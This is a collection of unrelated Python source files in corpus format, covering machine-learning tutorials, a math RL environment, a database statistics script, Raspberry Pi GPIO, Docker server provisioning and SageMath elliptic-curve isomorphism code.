test_y = list(test_df["onehot_label"].apply(literal_eval))
print("\nLoading in trained model...")
# Load in trained model
trained_model = load_model(f"../../models/text/{TASK}/{TASK}.hdf5")
print(trained_model.summary())
print("\nPredicting testing data...")
# Predict testing data using trained model
pred_y = trained_model.predict(test_X, batch_size=128)
print("\nGetting performance metrics...")
# Get performance metrics
get_performance_metrics(test_y, pred_y, test_df, TASK, "text")
| StarcoderdataPython |
66333 | import random
from typing import Any, Dict, List, Optional, Type
from mathy_core.expressions import MathExpression
from mathy_core.problems import get_rand_term_templates, mathy_term_string
from mathy_core.rule import BaseRule
from mathy_core.rules import (
AssociativeSwapRule,
CommutativeSwapRule,
ConstantsSimplifyRule,
DistributiveFactorOutRule,
DistributiveMultiplyRule,
VariableMultiplyRule,
)
from mathy_core.util import TermEx, get_term_ex, get_terms
from .. import time_step
from ..env import MathyEnvProblem
from ..state import MathyEnvState, MathyEnvStateStep, MathyObservation
from ..types import EnvRewards, MathyEnvDifficulty, MathyEnvProblemArgs
from .poly_simplify import PolySimplify
class PolyHaystackLikeTerms(PolySimplify):
"""Act on any node in the expression that has another term like it
somewhere else. For example in the problem:
2x + 8 + 13.2y + z^2 + 5x
^^---------------------^^
Applying any rule to one of those nodes is a win. The idea here is that
in order to succeed at this task, the model must build a representation
that can identify like terms in a large expression tree.
"""
def __init__(self, **kwargs: Any):
super(PolyHaystackLikeTerms, self).__init__(**kwargs)
def get_env_namespace(self) -> str:
return "mathy.polynomials.haystack.like.terms"
def get_penalizing_actions(self, state: MathyEnvState) -> List[Type[BaseRule]]:
return [
CommutativeSwapRule,
AssociativeSwapRule,
DistributiveFactorOutRule,
DistributiveMultiplyRule,
ConstantsSimplifyRule,
VariableMultiplyRule,
]
def max_moves_fn(
self, problem: MathyEnvProblem, config: MathyEnvProblemArgs
) -> int:
return problem.complexity
def transition_fn(
self,
env_state: MathyEnvState,
expression: MathExpression,
features: MathyObservation,
) -> Optional[time_step.TimeStep]:
"""If all like terms are siblings."""
agent = env_state.agent
if len(agent.history) == 0:
return None
# History gets pushed before this fn, so history[-1] is the current state,
# and history[-2] is the previous state. Find the previous state node we
# acted on, and compare to that.
curr_timestep: MathyEnvStateStep = agent.history[-1]
last_timestep: MathyEnvStateStep = agent.history[-2]
expression = self.parser.parse(last_timestep.raw)
action_node = self.get_token_at_index(expression, curr_timestep.action[1])
touched_term = get_term_ex(action_node)
term_nodes = get_terms(expression)
# We have the token_index of the term that was acted on, now we have to see
# if that term has any like siblings (not itself). We do this by ignoring the
# term with a matching r_index to the node the agent acted on.
#
# find_nodes updates the `r_index` value on each node which is the token index
BaseRule().find_nodes(expression)
like_counts: Dict[str, int] = {}
all_indices: Dict[str, List[int]] = {}
max_index = 0
for term_node in term_nodes:
assert term_node is not None and term_node.r_index is not None
max_index = max(max_index, term_node.r_index)
ex: Optional[TermEx] = get_term_ex(term_node)
if ex is None:
continue
key = mathy_term_string(variable=ex.variable, exponent=ex.exponent)
if key == "":
key = "const"
if key not in like_counts:
like_counts[key] = 1
else:
like_counts[key] += 1
if key not in all_indices:
all_indices[key] = [term_node.r_index]
else:
all_indices[key].append(term_node.r_index)
like_indices: Optional[List[int]] = None
for key in all_indices.keys():
if len(all_indices[key]) > 1:
like_indices = all_indices[key]
if action_node is not None and touched_term is not None:
touched_key = mathy_term_string(
variable=touched_term.variable, exponent=touched_term.exponent
)
if touched_key in like_counts and like_counts[touched_key] > 1:
action_node.all_changed()
return time_step.termination(features, self.get_win_signal(env_state))
if env_state.agent.moves_remaining <= 0:
distances = []
if like_indices is not None:
assert action_node is not None and action_node.r_index is not None
for index in like_indices:
distances.append(abs(index - action_node.r_index))
loss_magnitude = min(distances) / max_index
else:
loss_magnitude = 1.0
lose_signal = EnvRewards.LOSE - loss_magnitude
return time_step.termination(features, lose_signal)
return None
def make_problem(
self,
min_terms: int,
max_terms: int,
like_terms: int,
exponent_probability: float,
) -> str:
assert min_terms <= max_terms, "min cannot be greater than max"
assert like_terms < min_terms, "must have atleast one term that is not like"
out_terms = []
total_terms = random.randint(min_terms, max_terms)
num_diff_terms = total_terms - like_terms
diff_term_tpls = get_rand_term_templates(
num_diff_terms + 1, exponent_probability=exponent_probability
)
like_term_tpl = diff_term_tpls[-1]
diff_term_tpls = diff_term_tpls[:-1]
for i in range(like_terms):
out_terms.append(like_term_tpl.make())
for tpl in diff_term_tpls:
out_terms.append(tpl.make())
random.shuffle(out_terms)
problem = " + ".join(out_terms)
return problem
def problem_fn(self, params: MathyEnvProblemArgs) -> MathyEnvProblem:
if params.difficulty == MathyEnvDifficulty.easy:
text = self.make_problem(
min_terms=3, max_terms=8, like_terms=2, exponent_probability=0.3
)
elif params.difficulty == MathyEnvDifficulty.normal:
text = self.make_problem(
min_terms=4, max_terms=7, like_terms=2, exponent_probability=0.5
)
elif params.difficulty == MathyEnvDifficulty.hard:
text = self.make_problem(
min_terms=5, max_terms=12, like_terms=2, exponent_probability=0.4
)
else:
raise ValueError(f"Unknown difficulty: {params.difficulty}")
return MathyEnvProblem(text, 2, self.get_env_namespace())
| StarcoderdataPython |
3232297 | from FileSystemItem import FileSystemItem
class File(FileSystemItem):
def __init__(self, size):
self.size = size
def get_size(self):
return self.size
| StarcoderdataPython |
82628 | <filename>scripts/check_enumerative_guesses.py<gh_stars>0
#!/usr/bin/python
import os
import subprocess
import sys
import time
import re
import itertools
import json
num_instrs = [1, 2, 3]
files = ['enum0.opt', 'enum1.opt']
dataflows = ['false']
configs = itertools.product(num_instrs, files, dataflows)
# 0 - num-instrs, 1 - filename, 2 - dataflow
output_lines = []
for conf in configs:
cmd_enum = "./souper-check -z3-path=\"../third_party/z3-install/bin/z3\" -souper-enumerative-synthesis-debug-level=2 -solver-timeout=60 -infer-rhs -souper-enumerative-synthesis -souper-enumerative-synthesis-num-instructions=%d -souper-dataflow-pruning=%s -souper-enumerative-synthesis-skip-solver %s" % (conf[0], conf[2], conf[1])
time_start = time.time()
output = subprocess.check_output(cmd_enum, stderr=subprocess.STDOUT, shell=True)
time_end = time.time()
guesses = re.search('There are.*Guesses', output).group()
dataflowpruned = re.search('Dataflow Pruned .*', output).group()
output_lines.append('For %s(%d): (took %f seconds). [%s]' % (conf[1], conf[0], round(time_end - time_start, 2), guesses))
data = dict()
data['body'] = '\n'.join(output_lines)
print(json.dumps(data))
| StarcoderdataPython |
3211951 | from model.Bacteria import Bacteria
class Anaerobs(Bacteria):
def __init__(self):
self.metabolismType = "Anaerob"
| StarcoderdataPython |
1708782 | <filename>majora2/migrations/0075_auto_20200505_1806.py
# Generated by Django 2.2.10 on 2020-05-05 18:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('majora2', '0074_temporarymajoraartifactmetric_thresholdcycle_temporarymajoraartifactmetricrecord_temporarymajoraarti'),
]
operations = [
migrations.AlterField(
model_name='temporarymajoraartifactmetricrecord_thresholdcycle',
name='ct_value',
field=models.FloatField(blank=True, null=True),
),
]
| StarcoderdataPython |
1794213 | #!/usr/bin/env python
# Update the total number of annotations and experiments each term appears in
'''Update the total number of annotations and experiments each term appears in
'''
import sys
import argparse
import psycopg2
import psycopg2.extras
import setproctitle
from collections import defaultdict
from dbbact_server import db_access
from dbbact_server.utils import debug, SetDebugLevel
__version__ = "0.9"
def update_term_info(con, cur):
cur2 = con.cursor(cursor_factory=psycopg2.extras.DictCursor)
debug(3, 'update_term_info started')
debug(2, 'dropping old TermInfoTable')
cur.execute('DELETE FROM TermInfoTable')
debug(2, 'processing annotations')
term_pos_exps = defaultdict(set)
term_neg_exps = defaultdict(set)
term_pos_anno = defaultdict(set)
term_neg_anno = defaultdict(set)
all_term_ids = set()
# iterate all annotationes / annotationsdetails
cur.execute('SELECT id, idexp FROM AnnotationsTable')
for idx, cres in enumerate(cur):
cannoid = cres['id']
cexp = cres['idexp']
if idx % 1000 == 0:
debug(2, 'processing annotation %d' % cannoid)
cur2.execute('SELECT idontology, idannotationdetail FROM AnnotationListTable WHERE idannotation=%s', [cannoid])
for cdres in cur2:
ctype = cdres['idannotationdetail']
ctermid = cdres['idontology']
all_term_ids.add(ctermid)
# if LOWER IN
if ctype == 2:
term_neg_exps[ctermid].add(cexp)
term_neg_anno[ctermid].add(cannoid)
else:
term_pos_exps[ctermid].add(cexp)
term_pos_anno[ctermid].add(cannoid)
debug(3, 'Found %d terms' % len(all_term_ids))
debug(2, 'adding stats to TermInfoTable')
for ctermid in all_term_ids:
cur2.execute('SELECT description FROM OntologyTable WHERE id=%s LIMIT 1', [ctermid])
if cur2.rowcount == 0:
debug(5, 'no term name in OntologyTable for termid %d. skipping' % ctermid)
continue
res = cur2.fetchone()
cterm = res[0]
tot_exps_pos = len(term_pos_exps[ctermid])
tot_anno_pos = len(term_pos_anno[ctermid])
tot_exps_neg = len(term_neg_exps[ctermid])
tot_anno_neg = len(term_neg_anno[ctermid])
if ctermid in term_pos_exps:
# test if we already have the term in the terminfotable
# if the term was already added (so same term name with 2 different term_ids (from 2 ontologies) in different annotations)
# we want to agglomerate the count
cur2.execute('SELECT TotalExperiments, TotalAnnotations FROM TermInfoTable WHERE term=%s LIMIT 1', [cterm])
if cur2.rowcount > 0:
res = cur2.fetchone()
debug(2, 'already found %s' % cterm)
tot_exps_pos += res[0]
tot_anno_pos += res[1]
cur2.execute('DELETE FROM TermInfoTable WHERE term=%s', [cterm])
cur2.execute('INSERT INTO TermInfoTable (term, TotalExperiments, TotalAnnotations,TermType) VALUES (%s, %s, %s, %s)', [cterm, tot_exps_pos, tot_anno_pos, 'single'])
if ctermid in term_neg_exps:
# test if we already have the term in the terminfotable
# if the term was already added (so same term name with 2 different term_ids (from 2 ontologies) in different annotations)
# we want to agglomerate the count
cur2.execute('SELECT TotalExperiments, TotalAnnotations FROM TermInfoTable WHERE term=%s LIMIT 1', ['-' + cterm])
if cur2.rowcount > 0:
res = cur2.fetchone()
debug(2, 'already found -%s' % cterm)
tot_exps_neg += res[0]
tot_anno_neg += res[1]
cur2.execute('DELETE FROM TermInfoTable WHERE term=%s', ['-' + cterm])
cur2.execute('INSERT INTO TermInfoTable (term, TotalExperiments, TotalAnnotations,TermType) VALUES (%s, %s, %s, %s)', ['-' + cterm, tot_exps_neg, tot_anno_neg, 'single'])
debug(2, 'committing')
con.commit()
debug(3, 'done')
def update_term_info_old(con, cur):
    """Rebuild TermInfoTable from scratch by scanning every ontology term.

    For each term in OntologyTable, counts the distinct experiments and
    annotations where the term appears positively and negatively ("LOWER IN"),
    and inserts one row per direction into TermInfoTable.

    Parameters
    ----------
    con : psycopg2 connection (committed at the end)
    cur : psycopg2 cursor used for the outer term iteration
    """
    # Separate cursors so the nested queries do not disturb the outer iteration.
    cur2 = con.cursor(cursor_factory=psycopg2.extras.DictCursor)
    cur3 = con.cursor(cursor_factory=psycopg2.extras.DictCursor)
    debug(3, 'update_term_info started')
    debug(2, 'dropping old TermInfoTable')
    cur.execute('DELETE FROM TermInfoTable')
    debug(2, 'processing terms')
    cur.execute('SELECT id,description FROM OntologyTable')
    for idx, cres in enumerate(cur):
        # Distinct experiments / annotations per direction for this term.
        term_exps_pos = set()
        term_exps_neg = set()
        term_annotations_pos = set()
        term_annotations_neg = set()
        ctermid = cres['id']
        cterm = cres['description']
        # get all the annotations containing this term
        cur2.execute('SELECT idannotation,idannotationdetail FROM AnnotationListTable WHERE idontology=%s', [ctermid])
        for ctres in cur2:
            ctype = ctres['idannotationdetail']
            cannotation = ctres['idannotation']
            # get more info about the annotation
            cur3.execute('SELECT idexp FROM AnnotationsTable WHERE id=%s LIMIT 1', [cannotation])
            cares = cur3.fetchone()
            cexp = cares['idexp']
            # if it's "LOWER IN cterm" it is neg
            if ctype == 2:
                term_exps_neg.add(cexp)
                term_annotations_neg.add(cannotation)
            else:
                term_exps_pos.add(cexp)
                term_annotations_pos.add(cannotation)
        # One row for the positive direction, one for the negative ('-' prefix).
        cur2.execute('INSERT INTO TermInfoTable (term, TotalExperiments, TotalAnnotations,TermType) VALUES (%s, %s, %s, %s)', [cterm, len(term_exps_pos), len(term_annotations_pos), 'single'])
        cur2.execute('INSERT INTO TermInfoTable (term, TotalExperiments, TotalAnnotations,TermType) VALUES (%s, %s, %s, %s)', ['-' + cterm, len(term_exps_neg), len(term_annotations_neg), 'single'])
        if idx % 1000 == 0:
            debug(2, 'processed term %d: %s. pos exps %d, pos anno %d, neg exps %d, neg anno %d' % (idx, cterm, len(term_exps_pos), len(term_annotations_pos), len(term_exps_neg), len(term_annotations_neg)))
        # NOTE(review): 'small village' looks like leftover ad-hoc debugging of a
        # single term -- confirm whether this branch can be removed.
        if cterm == 'small village':
            debug(2, 'processed term %d: %s. pos exps %d, pos anno %d, neg exps %d, neg anno %d' % (idx, cterm, len(term_exps_pos), len(term_annotations_pos), len(term_exps_neg), len(term_annotations_neg)))
    debug(2, 'committing')
    con.commit()
    debug(3, 'done')
def main(argv):
    """Command-line entry point: parse connection options and rebuild TermInfoTable.

    Parameters
    ----------
    argv : list of str
        Command-line arguments (without the program name).
    """
    parser = argparse.ArgumentParser(description='Add annotation/experiment counts to all dbbact sequences. version ' + __version__)
    parser.add_argument('--port', help='postgres port', default=5432, type=int)
    parser.add_argument('--host', help='postgres host', default=None)
    parser.add_argument('--database', help='postgres database', default='dbbact')
    parser.add_argument('--user', help='postgres user', default='dbbact')
    # NOTE(review): the default below is an anonymization placeholder; supply a
    # real password via --password when running.
    parser.add_argument('--password', help='postgres password', default='<PASSWORD>')
    parser.add_argument('--proc-title', help='name of the process (to view in ps aux)')
    parser.add_argument('--debug-level', help='debug level (1 for debug ... 9 for critical)', default=2, type=int)
    args = parser.parse_args(argv)
    SetDebugLevel(args.debug_level)
    # set the process name for ps aux
    if args.proc_title:
        setproctitle.setproctitle(args.proc_title)
    # BUG FIX: the password argument was a bare invalid token; pass the parsed
    # command-line value instead.
    con, cur = db_access.connect_db(database=args.database, user=args.user, password=args.password, port=args.port, host=args.host)
    update_term_info(con, cur)
if __name__ == "__main__":
    # Script entry point: forward command-line args (minus the program name).
    main(sys.argv[1:])
| StarcoderdataPython |
3201456 | <filename>single-led.py
import RPi.GPIO as GPIO
import time
# Blink the LED wired to BCM pin 18 once: on for one second, then off.
GPIO.setmode(GPIO.BCM)
GPIO.setup(18, GPIO.OUT)

# BUG FIX: the original used Python 2 print statements, which are syntax
# errors on Python 3; print() works on both.
print("LED On")
GPIO.output(18, GPIO.HIGH)
time.sleep(1)
print("LED Off")
GPIO.output(18, GPIO.LOW)
# Release the GPIO pin so later programs start from a clean state.
GPIO.cleanup()
| StarcoderdataPython |
1751654 | import keras.losses as kloss
import concise.losses as closs
from concise.losses import MASK_VALUE
import numpy as np
import keras.backend as K
import keras.layers as kl
from keras.models import Model, load_model
from keras.utils.generic_utils import deserialize_keras_object, serialize_keras_object, get_custom_objects
def test_MaskLoss():
    """binary_crossentropy_masked must ignore entries equal to MASK_VALUE and
    survive a Keras serialization round-trip unchanged."""
    l = closs.binary_crossentropy_masked
    y_pred = np.array([0, 0.2, 0.6, 0.4, 1])
    y_true = np.array([1, 0, -1, 1, 0.0])

    # Reference: plain binary_crossentropy on only the unmasked entries.
    y_true_mask = K.cast(y_true[y_true != MASK_VALUE], K.floatx())
    y_pred_mask = K.cast(y_pred[y_true != MASK_VALUE], K.floatx())

    res = K.eval(l(y_true, y_pred))
    res_mask = K.eval(kloss.binary_crossentropy(y_true_mask, y_pred_mask))
    assert np.allclose(res, res_mask)

    # Serialization round-trip must preserve the loss behaviour.
    # (Removed two unused K.cast locals and dead commented-out asserts.)
    s = serialize_keras_object(l)
    a = deserialize_keras_object(s)
    res2 = K.eval(a(y_true, y_pred))
    assert np.allclose(res, res2)
def test_ConvDNAQuantitySplines(tmpdir):
    """Train a minimal dense model with the masked loss and round-trip it
    through disk via model.save / load_model."""
    features = np.vstack([np.arange(15), np.arange(15)])
    targets = np.arange(2)

    input_layer = kl.Input((15,))
    output_layer = kl.Dense(1)(input_layer)
    net = Model(input_layer, output_layer)
    net.compile("Adam", loss=closs.binary_crossentropy_masked)
    net.fit(features, targets)

    # Save and reload the model; the custom loss must deserialize cleanly.
    save_path = str(tmpdir.mkdir('data').join('test_keras.h5'))
    net.save(save_path)
    reloaded = load_model(save_path)
    assert isinstance(reloaded, Model)
| StarcoderdataPython |
46444 | <reponame>gnubyte/publicServerAutomator<gh_stars>0
# @Author: <NAME>
# @Date 4-13-2018
# ----------------
import server
# Shell commands that provision a Debian host with Docker CE plus a few
# baseline packages; executed in order on the remote server.
dockerInstructions = [
    "apt-get update -y",
    "apt-get install apt-transport-https -y",
    "apt-get install software-properties-common -y",
    "apt-get install curl -y",
    "apt-get install gnupg2 -y",
    "apt-get install git -y",
    "apt-get install acl -y",
    # BUG FIX: a missing trailing comma here used to merge this entry with the
    # add-apt-repository command below via implicit string concatenation,
    # producing one malformed command instead of two.
    "apt-get install fail2ban -y",
    '''add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/debian $(lsb_release -cs) stable"''',
    "apt-get update -y",
    "apt-get install docker-ce -y",
    "docker run hello-world"
]
# Connect to the target host and run the provisioning commands in order.
# NOTE(review): the key path, key password and server IP below are placeholder
# values; presumably they are replaced with real credentials before running --
# confirm before use.
newDocker = server.Server(inputKeyPath="publickey.pem", inputKeyPassword='<PASSWORD>', inputServerIP="0.0.0.0" )
newDocker.set_commands(commandList=dockerInstructions)
newDocker.connect()
newDocker.run_commands()
1705329 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import sys
from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
FLAGS = None  # replaced by the parsed argparse namespace in the __main__ block
def main(_):
  """Train a single-layer softmax regression model on MNIST and print its
  test-set accuracy.

  Args:
    _: unused positional argument supplied by tf.app.run().
  """
  mnist = input_data.read_data_sets(FLAGS.data_dir, one_hot=True)

  # Model: logits y = x*W + b over flattened 28x28 images (784 -> 10 classes).
  x = tf.placeholder(tf.float32, shape=[None, 784])
  y_ = tf.placeholder(tf.float32, shape=[None, 10])
  W = tf.Variable(tf.zeros([784,10]))
  b = tf.Variable(tf.zeros([10]))
  y = tf.matmul(x,W) + b

  # BUG FIX: tf.nn.softmax_cross_entropy_with_logits requires keyword
  # arguments since TF 1.0 (a sentinel blocks positional use); the old
  # positional call (y, y_) fails there. Name them explicitly.
  cross_entropy = tf.reduce_mean(
      tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y))
  train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)

  sess = tf.InteractiveSession()
  tf.global_variables_initializer().run()
  # 1000 steps of mini-batch SGD, batch size 100.
  for i in range(1000):
    batch = mnist.train.next_batch(100)
    train_step.run(feed_dict={x: batch[0], y_: batch[1]})

  # Accuracy = fraction of test images whose argmax prediction matches the label.
  correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
  accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
  print(
      accuracy.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels}))
if __name__ == '__main__':
  # Parse the known flags into the module-level FLAGS and hand any remaining
  # argv entries back to tf.app.run(), which invokes main().
  parser = argparse.ArgumentParser()
  parser.add_argument(
      '--data_dir', type=str, default='/tmp/tensorflow/mnist/input_data',
      help='Directory for storing input data')
  FLAGS, unparsed = parser.parse_known_args()
  tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| StarcoderdataPython |
143935 | <reponame>bopopescu/classic_diff_geom<filename>src/sage/schemes/elliptic_curves/weierstrass_morphism.py
r"""
Isomorphisms between Weierstrass models of elliptic curves
AUTHORS:
- <NAME> (2007): initial version
- <NAME> (Jan 2008): isomorphisms, automorphisms and twists
in all characteristics
"""
#*****************************************************************************
# Copyright (C) 2007 <NAME> <<EMAIL>>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.categories.morphism import Morphism
from constructor import EllipticCurve
from sage.categories.homset import Hom
class baseWI:
    r"""
    This class implements the basic arithmetic of isomorphisms between
    Weierstrass models of elliptic curves.  These are specified by
    lists of the form `[u,r,s,t]` (with `u\not=0`) which specifies a
    transformation `(x,y) \mapsto (x',y')` where

    `(x,y) = (u^2x'+r , u^3y' + su^2x' + t).`

    INPUT:

    - ``u,r,s,t`` (default (1,0,0,0)) -- standard parameters of an isomorphism between Weierstrass models.

    EXAMPLES::

        sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
        sage: baseWI()
        (1, 0, 0, 0)
        sage: baseWI(2,3,4,5)
        (2, 3, 4, 5)
        sage: R.<u,r,s,t>=QQ[]; baseWI(u,r,s,t)
        (u, r, s, t)
    """
    def __init__(self, u=1, r=0, s=0, t=0):
        r"""
        Constructor: check for valid parameters (defaults to identity).

        INPUT:

        - ``u,r,s,t`` (default (1,0,0,0)) -- standard parameters of an isomorphism between Weierstrass models.

        EXAMPLES::

            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
            sage: baseWI()
            (1, 0, 0, 0)
            sage: baseWI(2,3,4,5)
            (2, 3, 4, 5)
            sage: R.<u,r,s,t>=QQ[]; baseWI(u,r,s,t)
            (u, r, s, t)
        """
        # u scales the model and must be invertible.
        if u==0:
            raise ValueError("u!=0 required for baseWI")
        self.u=u; self.r=r; self.s=s; self.t=t
    def __cmp__(self, other):
        """
        Standard comparison function.

        The ordering is just lexicographic on the tuple `(u,r,s,t)`.

        .. note::

           In a list of automorphisms, there is no guarantee that the
           identity will be first!

        EXAMPLE::

            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
            sage: baseWI(1,2,3,4)==baseWI(1,2,3,4)
            True
            sage: baseWI(1,2,3,4)<baseWI(1,2,3,5)
            True
            sage: baseWI(1,2,3,4)>baseWI(1,2,3,4)
            False

        It will never return equality if other is of another type::

            sage: baseWI() == 1
            False
        """
        if not isinstance(other, baseWI):
            return cmp(type(self), type(other))
        return cmp(self.tuple(), other.tuple())
    def tuple(self):
        r"""
        Returns the parameters `u,r,s,t` as a tuple.

        EXAMPLES::

            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
            sage: u,r,s,t=baseWI(2,3,4,5).tuple()
            sage: w=baseWI(2,3,4,5)
            sage: u,r,s,t=w.tuple()
            sage: u
            2
        """
        return (self.u,self.r,self.s,self.t)
    def __mul__(self, other):
        r"""
        Returns the composition of this isomorphism and another.

        EXAMPLES::

            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
            sage: baseWI(1,2,3,4)*baseWI(5,6,7,8)
            (5, 56, 22, 858)
            sage: baseWI()*baseWI(1,2,3,4)*baseWI()
            (1, 2, 3, 4)
        """
        # Composition formula for (u,r,s,t)-transformations: apply 'other'
        # first, then 'self'.
        u1,r1,s1,t1=other.tuple()
        u2,r2,s2,t2=self.tuple()
        return baseWI(u1*u2,(u1**2)*r2+r1,u1*s2+s1,(u1**3)*t2+s1*(u1**2)*r2+t1)
    def __invert__(self):
        r"""
        Returns the inverse of this isomorphism.

        EXAMPLES::

            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
            sage: w=baseWI(2,3,4,5)
            sage: ~w
            (1/2, -3/4, -2, 7/8)
            sage: w*~w
            (1, 0, 0, 0)
            sage: ~w*w
            (1, 0, 0, 0)
            sage: R.<u,r,s,t>=QQ[]; w=baseWI(u,r,s,t)
            sage: ~w
            (1/u, (-r)/u^2, (-s)/u, (r*s - t)/u^3)
            sage: ~w*w
            (1, 0, 0, 0)
        """
        u,r,s,t=self.tuple()
        return baseWI(1/u,-r/(u**2),-s/u,(r*s-t)/(u**3))
    def __repr__(self):
        r"""
        Returns the string representation of this isomorphism.

        EXAMPLES::

            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
            sage: baseWI(2,3,4,5)
            (2, 3, 4, 5)
        """
        return self.tuple().__repr__()
    def is_identity(self):
        r"""
        Returns True if this is the identity isomorphism.

        EXAMPLES::

            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
            sage: w=baseWI(); w.is_identity()
            True
            sage: w=baseWI(2,3,4,5); w.is_identity()
            False
        """
        return self.tuple()==(1,0,0,0)
    def __call__(self, EorP):
        r"""
        Base application of isomorphisms to curves and points: a
        baseWI `w` may be applied to a list `[a1,a2,a3,a4,a6]`
        representing the `a`-invariants of an elliptic curve `E`,
        returning the `a`-invariants of `w(E)`; or to `P=[x,y]` or
        `P=[x,y,z]` representing a point in `\mathbb{A}^2` or
        `\mathbb{P}^2`, returning the transformed point.

        INPUT:

        - ``EorP`` -- either an elliptic curve, or a point on an elliptic curve.

        OUTPUT:

        The transformed curve or point.

        EXAMPLES::

            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
            sage: E=EllipticCurve([0,0,1,-7,6])
            sage: w=baseWI(2,3,4,5);
            sage: w(E.ainvs())
            [4, -7/4, 11/8, -3/2, -9/32]
            sage: P=E(-2,3)
            sage: w(P.xy())
            [-5/4, 9/4]
            sage: EllipticCurve(w(E.ainvs()))(w(P.xy()))
            (-5/4 : 9/4 : 1)
        """
        u,r,s,t=self.tuple()
        if len(EorP)==5:
            # a-invariant transformation.  The update order matters: each line
            # must read the *old* values of the invariants updated after it
            # (a6 uses old a4,a3,a2,a1; a4 uses old a3,a2,a1; etc.).
            a1,a2,a3,a4,a6=EorP
            a6 += r*(a4 + r*(a2 + r)) - t*(a3 + r*a1 + t);
            a4 += -s*a3 + 2*r*a2 - (t + r*s)*a1 + 3*r*r - 2*s*t;
            a3 += r*a1 +t+t;
            a2 += -s*a1 + 3*r - s*s;
            a1 += 2*s;
            return [a1/u,a2/u**2,a3/u**3,a4/u**4,a6/u**6]
        if len(EorP)==2:
            # Affine point (x,y).
            x,y=EorP
            x-=r
            y-=(s*x+t)
            return [x/u**2,y/u**3]
        if len(EorP)==3:
            # Projective point (x:y:z).
            x,y,z=EorP
            x-=r*z
            y-=(s*x+t*z)
            return [x/u**2,y/u**3,z]
        raise ValueError("baseWI(a) only for a=(x,y), (x:y:z) or (a1,a2,a3,a4,a6)")
def isomorphisms(E,F,JustOne=False):
    r"""
    Returns one or all isomorphisms between two elliptic curves.

    INPUT:

    - ``E``, ``F`` (EllipticCurve) -- Two elliptic curves.

    - ``JustOne`` (bool) If True, returns one isomorphism, or None if
      the curves are not isomorphic.  If False, returns a (possibly
      empty) list of isomorphisms.

    OUTPUT:

    Either None, or a 4-tuple `(u,r,s,t)` representing an isomorphism,
    or a list of these.

    .. note::

       This function is not intended for users, who should use the
       interface provided by ``ell_generic``.

    EXAMPLES::

        sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
        sage: isomorphisms(EllipticCurve_from_j(0),EllipticCurve('27a3'))
        [(-1, 0, 0, -1), (1, 0, 0, 0)]
        sage: isomorphisms(EllipticCurve_from_j(0),EllipticCurve('27a3'),JustOne=True)
        (1, 0, 0, 0)
        sage: isomorphisms(EllipticCurve_from_j(0),EllipticCurve('27a1'))
        []
        sage: isomorphisms(EllipticCurve_from_j(0),EllipticCurve('27a1'),JustOne=True)
    """
    from ell_generic import is_EllipticCurve
    if not is_EllipticCurve(E) or not is_EllipticCurve(F):
        raise ValueError("arguments are not elliptic curves")
    K = E.base_ring()
    # if not K == F.base_ring(): return []
    # Isomorphic curves must share the j-invariant; cheap early exit.
    j=E.j_invariant()
    if j != F.j_invariant():
        if JustOne: return None
        return []
    from sage.rings.all import PolynomialRing
    x=PolynomialRing(K,'x').gen()
    a1E, a2E, a3E, a4E, a6E = E.ainvs()
    a1F, a2F, a3F, a4F, a6F = F.ainvs()
    char=K.characteristic()
    # Characteristic 2 needs its own formulas (the generic case divides by 2,3).
    if char==2:
        if j==0:
            ulist=(x**3-(a3E/a3F)).roots(multiplicities=False)
            ans=[]
            for u in ulist:
                slist=(x**4+a3E*x+(a2F**2+a4F)*u**4+a2E**2+a4E).roots(multiplicities=False)
                for s in slist:
                    r=s**2+a2E+a2F*u**2
                    tlist= (x**2 + a3E*x + r**3 + a2E*r**2 + a4E*r + a6E + a6F*u**6).roots(multiplicities=False)
                    for t in tlist:
                        if JustOne: return (u,r,s,t)
                        ans.append((u,r,s,t))
            if JustOne: return None
            ans.sort()
            return ans
        else:
            ans=[]
            u=a1E/a1F
            r=(a3E+a3F*u**3)/a1E
            slist=[s[0] for s in (x**2+a1E*x+(r+a2E+a2F*u**2)).roots()]
            for s in slist:
                t = (a4E+a4F*u**4 + s*a3E + r*s*a1E + r**2)
                if JustOne: return (u,r,s,t)
                ans.append((u,r,s,t))
            if JustOne: return None
            ans.sort()
            return ans
    b2E, b4E, b6E, b8E = E.b_invariants()
    b2F, b4F, b6F, b8F = F.b_invariants()
    # Characteristic 3 also needs special-case formulas.
    if char==3:
        if j==0:
            ulist=(x**4-(b4E/b4F)).roots(multiplicities=False)
            ans=[]
            for u in ulist:
                s=a1E-a1F*u
                t=a3E-a3F*u**3
                rlist=(x**3-b4E*x+(b6E-b6F*u**6)).roots(multiplicities=False)
                for r in rlist:
                    if JustOne: return (u,r,s,t+r*a1E)
                    ans.append((u,r,s,t+r*a1E))
            if JustOne: return None
            ans.sort()
            return ans
        else:
            ulist=(x**2-(b2E/b2F)).roots(multiplicities=False)
            ans=[]
            for u in ulist:
                r = (b4F*u**4 -b4E)/b2E
                s = (a1E-a1F*u)
                t = (a3E-a3F*u**3 + a1E*r)
                if JustOne: return (u,r,s,t)
                ans.append((u,r,s,t))
            if JustOne: return None
            ans.sort()
            return ans
    # now char!=2,3:
